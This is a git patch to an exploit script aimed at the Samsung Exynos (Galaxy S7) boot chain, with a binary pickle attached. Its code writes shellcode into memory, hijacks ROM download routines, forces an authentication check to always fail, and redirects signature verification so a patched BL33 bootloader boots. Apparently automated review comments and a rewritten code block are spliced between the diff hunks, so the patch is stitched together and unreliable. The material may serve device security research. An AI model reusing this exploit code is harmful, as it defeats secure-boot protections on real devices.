From 0174b2a4f7b40b1b0b075293e789bd9176a79f3c Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen
Date: Tue, 24 Sep 2024 18:50:11 +0200
Subject: [PATCH] Boots patched BL33
---
source/exploit/exploit.py | 74 ++++++++++++++++++++++-------------
source/exploit/ttbr0_el3.pkl | Bin 0 -> 4762 bytes
2 files changed, 47 insertions(+), 27 deletions(-)
create mode 100644 source/exploit/ttbr0_el3.pkl
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 5846723..5eef337 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -599,7 +599,7 @@ class ExynosDevice():
assert ttbr0 == b"\x00" * 0x8, "TTBR0_EL3 not overwritten"
- def test_write_execute(self, address):
+ def test_write_execute(self, address, execute=True):
""" At given address, test if it is possible to write and execute code, by writing a simple jump to, and jump back. """
@@ -613,10 +613,11 @@ class ExynosDevice():
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(address, shellcode)
- self.cd.jump_to(address)
- self.usb_write(b"PING")
- assert self.usb_read(0x200) == b"PONG", "Failed to jump back to debugger"
- print(f'Jumped to {hex(address)} and back')
+ if execute:
+ self.cd.jump_to(address)
+ self.usb_write(b"PING")
+ assert self.usb_read(0x200) == b"PONG", "Failed to jump back to debugger"
+ print(f'Jumped to {hex(address)} and back')
def debugger_boot(self):
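Review bot: The new `execute` flag is not described in the docstring of `test_write_execute`, which still says the method tests write and execute even though `execute=False` now only writes the shellcode and returns without any output; add a line such as `execute: when False, only write the code at address and skip the jump and the PING/PONG round trip.` The same flag drives the -613 hunk, where the skipped branch is silent, so a caller cannot tell from the console whether the write happened; an `else: print(f'Wrote shellcode to {hex(address)}')` would keep the output symmetric. The body of `test_write_execute` continues between the two hunks and is not visible here.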
@@ -654,15 +655,28 @@ class ExynosDevice():
self.connect_device()
# Send boot stage 1
- self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
+ bl1 = open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()
+ self.send_normal_stage(bl1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
+ # Dump contents of TTBR0_EL3 from memory into a pandas dataframe and write it to a pickle file
+ import pandas as pd
+ blub = self.cd.memdump_region(0x02035000, 0x1000)
+ try:
+ df = pd.read_pickle('ttbr0_el3.pkl')
+ # Concat data to existing dataframe
+ df = pd.concat([df, pd.Series([blub])], ignore_index=True)
+ except:
+ df = pd.DataFrame()
+ df['TTBR0_EL3'] = [blub]
+ df.to_pickle('ttbr0_el3.pkl')
+ # Setup jump and bl_auth
AUTH_BL1 = 0x00012848 # Location of the authentication function
- def auth_bl1(lr=0x2069000):
+ def auth_bl1(lr=0x2069000, x0=1, x1=1):
# Load the firmware
- self.cd.arch_dbg.state.X0 = 1
- self.cd.arch_dbg.state.X1 = 1
+ self.cd.arch_dbg.state.X0 = x0
+ self.cd.arch_dbg.state.X1 = x1
self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
self.cd.restore_stack_and_jump(AUTH_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
@@ -678,6 +692,9 @@ class ExynosDevice():
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
+ # Write a patch to BL1 in memory
+ # self.cd.memwrite_region(0x2021800+bl1.find(b'2015'), b'2014')
+ # Jump into BL1 (sboot.bin.1.bin)
JUMP_BL1 = 0x000002c0
def jump_bl1(lr):
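Review bot: The two branches of the new TTBR0_EL3 dump code build different frames: the `except` branch stores the dump under a `TTBR0_EL3` column, while the `try` branch appends `pd.Series([blub])`, which `pd.concat` places in a new unnamed column `0` with `NaN` under `TTBR0_EL3`, so from the second run on the dumps end up split across two columns. The bare `except:` also turns a corrupt or unreadable pickle (or a Ctrl-C during the read) into a silent fresh frame that then overwrites the old file; `except FileNotFoundError:` is what the comment describes, and appending a one-row `pd.DataFrame({'TTBR0_EL3': [blub]})` in both cases keeps the schema stable. `pd.read_pickle` unpickles a file this commit also checks into the repository, so a plain format (appending the raw dump bytes to a file, or hex strings in a JSON list) would avoid running whatever that checked-in file contains when the script starts. The new `bl1 = open(...).read()` line keeps the pre-existing unclosed handle; `with open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb") as f: bl1 = f.read()` closes it. `debugger_boot` starts and ends outside this hunk.
```python
        # … unchanged: connect_device / send_normal_stage(bl1) / GiAs assert …
        # Dump TTBR0_EL3 from memory and append it as one row to the pickle file
        import pandas as pd
        blub = self.cd.memdump_region(0x02035000, 0x1000)
        try:
            df = pd.read_pickle('ttbr0_el3.pkl')
        except FileNotFoundError:
            # First run: start with an empty frame that already has the column
            df = pd.DataFrame(columns=['TTBR0_EL3'])
        # Same column on every path, so later runs do not grow a second column
        df = pd.concat([df, pd.DataFrame({'TTBR0_EL3': [blub]})], ignore_index=True)
        df.to_pickle('ttbr0_el3.pkl')
        # … unchanged: AUTH_BL1 / auth_bl1 and the rest of debugger_boot …
```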
@@ -719,7 +736,10 @@ class ExynosDevice():
TTBR0_EL3 = 0x02035600 # Zeroed out # Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
- self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1)) # Change check to always false
+ self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
+
+ # DWC3 OTG update mode -> Might be useful at some point?
+ # self.cd.memwrite_region(0x02021580, struct.pack('>I', 0x00000000)) # Jump into BL31 and execute it
self.cd.restore_stack_and_jump(0x02024010)
@@ -748,15 +768,6 @@ class ExynosDevice():
# ==== Stage 4 BL2 ====
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
-
- # Patching
- # bl2 = len(bl2)
- # patch_len = len(b"MNGS_QUAD")
- # patch = b"Patch" + (b"\x00" * (patch_len - len(b"Patch")))
- # patch_offset = bl2.find(b"MNGS_QUAD")
- # bl2 = bl2[:patch_offset] + patch + bl2[patch_len + patch_offset:]
- # assert len(stage4) == stage4_len, "Invalid bl2 length"
-
self.send_normal_stage(bl2)
time.sleep(2)
self.connect_device()
@@ -773,7 +784,7 @@ class ExynosDevice():
# Restore bootflow
print(self.cd.arch_dbg.state.print_ctx())
- BL33_jump = self.cd.arch_dbg.state.X0
+ BL33_ptr = self.cd.arch_dbg.state.X0
BL33_LR = self.cd.arch_dbg.state.LR
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
@@ -788,13 +799,22 @@ class ExynosDevice():
self.connect_device()
self.usb_read(0x200) # GiAs
- # Modify something in BL33
- # print(self.cd.memdump_region(0x8f063710, 0x8))
- # self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53616d74))
- # self.cd.memdump_region(0x8f063710, 0x8)
-
- self.cd.arch_dbg.state.X0 = BL33_jump
- self.cd.restore_stack_and_jump(BL33_LR)
+ print(self.cd.arch_dbg.state.print_ctx())
+
+ # Trying to patch BL33 but continuing good boot flow
+ # auth_bl1(DEBUGGER_ADDR, 0, 0)
+
+ # # Modify something in BL33
+ print(self.cd.memdump_region(0x8f063710, 0x8))
+ # Samsung == SaMtung
+ self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74))
+
+ # Modify USB Recovyer mode string to something else
+ self.cd.memwrite_region(0x8f06ab10, b'\x50\x41\x54\x43\x48\x49\x4e\x47\x20\x42\x4c\x33\x33\x3a\x2d\x29\x0a\x00')
+ print(self.cd.memdump_region(0x8f063710, 0x8))
+
+ # Do signature verification on BL2 instead of BL33 and proceed to boot (original is jump to 0x2024eec)
+ self.cd.restore_stack_and_jump(0x02024e58)
pass
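Review bot: After this hunk `BL33_ptr` and `BL33_LR`, assigned in the -773 hunk, are never read, because the `X0 = BL33_jump` restore and the jump to `BL33_LR` were removed; either drop both assignments or restore X0 before the final jump if the code at 0x02024e58 expects it — the diff does not show which. The second `print(self.cd.memdump_region(0x8f063710, 0x8))` re-reads the first patch site, so the 18-byte write to 0x8f06ab10 is never read back; presumably `0x8f06ab10` was meant there, and a comment stating that 18 bytes fit inside the original string's buffer would help the next reader. The escaped literal is plain ASCII and reads better as `b'PATCHING BL33:-)\n\x00'`. The inline `0x02024e58` deserves a named constant next to the `AUTH_BL1`/`JUMP_BL1` ones earlier in `debugger_boot`, and the trailing `pass` is dead code.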
diff --git a/source/exploit/ttbr0_el3.pkl b/source/exploit/ttbr0_el3.pkl new file mode 100644 index 0000000000000000000000000000000000000000..23088c82aeca3b011e6840860c4812085b03f5ee GIT binary patch literal 4762 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 W{5~OQ7}yu$2J=PXAE7XAlK%%+C?$#j literal 0 HcmV?d00001